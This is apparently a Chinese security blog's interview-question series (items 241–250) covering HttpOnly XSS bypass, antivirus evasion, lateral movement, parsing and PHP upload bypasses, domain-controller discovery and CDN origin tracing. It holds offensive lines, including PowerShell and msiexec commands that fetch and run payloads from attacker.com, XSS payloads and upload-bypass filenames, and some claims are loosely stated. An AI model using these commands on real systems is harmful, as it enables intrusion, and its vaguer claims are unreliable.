安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。
目錄
二百四十一、XSS 設置Http-Only如何繞過
二百四十二、XSS攻擊手段分類
二百四十三、高殺軟覆蓋工作組的滲透策略
二百四十四、內網橫向工具選型
二百四十五、fscan掃描崩潰處理
二百四十六、Apache/IIS解析漏洞
二百四十七、PHP文件上傳繞過
黑名單繞過
白名單繞過
解析漏洞利用
二百四十八、工作組橫向權限要求
二百四十九、域控定位方法大全
二百五十、CDN真實IP溯源
二百四十一、xss 設置http-only如何繞過二百四十二、xss攻擊手段有哪些二百四十三、遇到全是殺軟的工作組怎么辦二百四十四、使用什么工具內網橫向二百四十五、fscan掃機器崩了怎么辦二百四十六、apache iis 解析漏洞是什么二百四十七、php文件上傳繞過方式(黑、白名單、解析漏洞)二百四十八、工作組橫向需要用戶什么權限二百四十九、如何查找域控(盡可能多的方式)二百五十、如何從cdn 真實ip
二百四十一、XSS 設置Http-Only如何繞過
4類繞過技術:
- 瀏覽器漏洞利用
- 特定瀏覽器版本(如Chrome < v83)存在
Document.cookie
API繞過漏洞。- 跨域劫持(CORS濫用)
- 利用配置錯誤的
Access-Control-Allow-Origin: *
,通過XHR請求帶憑證訪問目標域:javascript
fetch('https://target.com/data', {credentials: 'include'}).then(...)
- 服務端請求偽造(SSRF+XSS組合)
- 通過XSS觸發內網SSRF,間接獲取含Cookie的響應(需存在SSRF漏洞)。
- 客戶端緩存嗅探
- 讀取瀏覽器緩存中未標記HttpOnly的敏感數據(如
localStorage
中的Token)。
二百四十二、XSS攻擊手段分類
5大攻擊類型及代表手法:
類型 原理 案例 反射型XSS 惡意腳本通過URL參數注入 http://site.com?search=<script>alert(1)</script>
存儲型XSS 腳本持久化存儲到數據庫 評論區植入惡意JS,影響所有訪問者 DOM型XSS 前端JS解析漏洞導致執行 eval(location.hash.slice(1))
盲打XSS 攻擊后臺管理界面 表單字段注入,等待管理員觸發 mXSS HTML解析變異導致過濾失效 <img src="x" onerror=alert(1)>
被錯誤凈化
二百四十三、高殺軟覆蓋工作組的滲透策略
免殺與隱蔽滲透方案:
- 無文件攻擊
- PowerShell內存加載:
powershell
IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/amsi-bypass.ps1')
- 合法工具濫用(LOLBAS)
- 使用微軟簽名的二進制文件執行操作:
cmd
msiexec /i http://attacker.com/payload.msi /quiet
- 網絡層隱蔽
- 使用ICMP/DNS隧道通信(工具:DNSCat2)。
- 進程注入
- 注入到可信進程(如
explorer.exe
)繞過內存掃描。- 硬件級后門
- 利用網卡固件漏洞(如Intel NIC)實現持久化。
二百四十四、內網橫向工具選型
按場景匹配工具:
目標 推薦工具 關鍵參數 主機發現 arp-scan
,nmap -sn
--localnet
掃描本地網段服務爆破 Hydra
,Medusa
-L user.txt -P pass.txt smb://
票據傳遞 Impacket-psexec
-k -no-pass
使用Kerberos票據漏洞利用 Metasploit
,CobaltStrike
use exploit/windows/smb/psexec
隱蔽通信 CobaltStrike Beacon
HTTPS監聽+SOCKS代理
二百四十五、fscan掃描崩潰處理
穩定性優化方案:
- 限制并發與超時
bash
./fscan -h 192.168.1.0/24 -t 64 -timeout 3
-t 64
:線程數≤64-timeout 3
:單主機超時3秒- 分片掃描
bash
split -l 100 targets.txt && for i in x*; do ./fscan -hf $i; done
- 內存釋放優化
- 使用
ulimit -v unlimited
解除內存限制。- 分布式掃描
- 將目標列表分割到多臺VPS執行。
二百四十六、Apache/IIS解析漏洞
服務器解析漏洞詳解:
服務器 漏洞版本 利用方式 Apache 1.x/2.x(配置錯誤) 上傳 test.php.jpg
觸發PHP執行IIS 6.0 Win2003 /shell.asp;.jpg
執行ASP代碼IIS 7.0+ 配置FastCGI錯誤 上傳 .php
文件改名為shell.jpg/.php
Nginx <0.8.37 shell.jpg%00.php
截斷解析
二百四十七、PHP文件上傳繞過
黑白名單對抗技術:
黑名單繞過
- 后綴大小寫變形:
Shell.PhP
- 雙寫后綴:
shell.pphphp
→ 過濾后為shell.php
- 特殊后綴:
.phtml
,.php5
,.phar
白名單繞過
- %00截斷:
shell.jpg%00.php
(需PHP<5.3.4)- 路徑拼接:
php
通過move_uploaded_file($_FILES["file"]["tmp_name"], "/uploads/" . $_GET["dir"] . "/" . $filename);
?dir=shell.php%00
截斷解析漏洞利用
- 結合Apache多后綴解析:
shell.php.xxx
→ 若.xxx
未定義,則向前識別為PHP
二百四十八、工作組橫向權限要求
必需的最小權限:
- SMB協議
- 目標主機的本地管理員憑證(或SMB共享寫入權限)。
- WMI執行
- 本地管理員權限 + 防火墻放行135/445端口。
- PsExec
- 管理員憑據 + ADMIN$共享訪問權限。
- 計劃任務
- 需加入本地管理員組(或Task Scheduler服務權限)。
二百四十九、域控定位方法大全
7種高效定位技術:
- DNS查詢
powershell
nslookup -type=SRV _ldap._tcp.dc._msdcs.domain.com
- 端口掃描
- 定位389(LDAP)/636(LDAPS)/88(Kerberos)端口開放主機。
- NetBIOS信息
cmd
nbtstat -A 192.168.1.1 # 查找<1C>記錄(域控制器)
- 活動目錄模塊
powershell
Get-ADDomainController -Discover -Service PrimaryDC
- 日志分析
- 事件ID 4662(對象訪問日志)中定位
CN=Domain Controllers
。- SPN掃描
bash
setspn -T domain.com -Q */*
- 默認組策略路徑
\\domain.com\SYSVOL\domain.com\Policies
僅域控可寫。
二百五十、CDN真實IP溯源
6層探測技術:
- 歷史DNS記錄
- 查詢
securitytrails.com
獲取歷史A記錄。- 子域名爆破
- 使用
amass
掃描未接入CDN的子域(如test.example.com
)。- SSL證書匹配
- 通過
crt.sh
搜索相同證書的IP。- 郵件服務器溯源
- 分析郵件頭
Received
字段中的原始IP。- 協議漏洞探測
- 發送HTTP 1.0請求或異常Host頭(如
Host: 127.0.0.1
)觸發CDN轉發錯誤。- 全球Ping監測
- 通過
viewdns.info
對比全球節點響應差異。